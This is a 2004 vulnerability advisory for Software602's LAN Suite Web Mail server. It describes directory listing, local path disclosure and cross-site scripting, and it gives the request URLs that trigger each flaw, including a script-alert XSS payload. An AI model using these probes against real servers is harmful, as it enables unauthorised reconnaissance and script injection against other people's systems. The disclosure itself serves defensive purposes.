####################################################################### Application: LAN SUITE Web Mail Server: WEB602/1.04 Vendors: Software602, Inc http://www.software602.com Versions: 602Pro Platforms: Windows Bug: Directory Listing, Local Path Disclosure and Cross Site Scripting Risk: Medium Exploitation: Remote with browser Date: 28 Feb 2004 Author: Rafel Ivgi, The-Insider E-mail: the_insider@mail.com Website: http://theinsider.deep-ice.com ####################################################################### 1) Introduction 2) Bugs 3) The Code ####################################################################### =============== 1) Introduction =============== Software602's PC Suite features a highly capable word processor, spreadsheet, and photo editor/organizer--and it won't cost you a dime if you're a home user. (Commercial customers pay $60, and all users must register the software within 30 days to unlock all the features.) Can it compete feature for feature with Word and Excel? No, but it has the essential tools you use every day. You can even get help, if you're willing to pay for it: E-mail support costs $50 for one year; phone support is $60 per incident. ####################################################################### ====== 2) Bug ====== Directory Listing: ----------------------- Upon refering to index.html directory listing of the folder is printed: http://<host>/index.html - directory listing http://<host>/cgi-bin/ http://<host>/users/ Local Path Disclosure: ------------------------------- Inside the mail login form, the local path of the server's folder is specified. http://<host>/mail/ <input type="hidden" name="Mail602Dir" value="C:\LANSUITE"> Cross Site Scripting: ---------------------------- When reffering to index.html as folder, text and script injection is available. http://<host>/index.html/<script>alert('XSS')</script> ####################################################################### =========== 3) The Code =========== Directory Listing: http://<host>/index.html Directory Listing: http://<host>/cgi-bin/ Local Path Disclosure: <input type="hidden" name="Mail602Dir" value="C:\LANSUITE"> Cross Site Scripting: http://<host>/index.html/<script>alert('XSS')</script> ####################################################################### --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Things that are unlikeable, are NOT impossible."